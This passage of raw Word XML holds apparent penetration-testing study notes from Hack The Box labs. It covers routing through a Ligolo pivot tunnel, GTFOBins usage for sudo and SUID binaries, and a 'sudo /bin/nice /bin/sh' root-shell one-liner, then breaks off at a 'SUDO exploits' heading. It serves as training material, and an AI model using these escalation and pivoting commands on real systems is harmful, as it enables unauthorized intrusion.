        <w:t xml:space="preserve">To route traffic through Ligolo and access the internal network, we use the following command on our attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add 172.18.0.0/16 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the Mask is only on the first 2 octets, not the first 3, so it's /16 and not /24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, the tunnel is established, and we can begin routing traffic through the container, allowing us to scan the internal network and interact with other potentially vulnerable services. We can start this on by doing an nmap ping sweep.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9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93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E94">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iidf4f9xxsnt" w:id="259"/>
      <w:bookmarkEnd w:id="259"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins / Binary (Unix Binaries)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E96">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of each section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used when you just want a shell, nothing more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used for when you run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see a binary (/usr/bin) or when you look at the output of LinPeas and see something under the SUDO section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used for when you run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see a binary with SUID bit set, or you looked at the LinPeas output and see something under the SUID section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what SUID bit looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r-xr-x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 4th bit is set to "s" instead of "x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As introduced via the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MonitorsTwo HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, learning how to exploit binaries is very simple via the </w:t>
      </w:r>
      <w:hyperlink r:id="rId638">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands in the website often assume you are in the "/bin" directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, we see this command: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since we need to specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/nice </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of just </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, unless we are already in /bin directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is "TF=$(mktemp -d)"?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="522" name="image502.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image502.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId639"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1409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EA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "mktemp" is a command used to create either a temporary file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here it's using d flag so it's a temporary directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is used by GTFOBins to represent a placeholder where you should be replacing it with your own specific file/directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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EAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jcwumehmcf3z" w:id="260"/>
      <w:bookmarkEnd w:id="260"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDO exploits </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_94qbyfaghzdc" w:id="261"/>
      <w:bookmarkEnd w:id="261"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Apache2 Configuration file (/bin/systemctl * apache2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId640">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
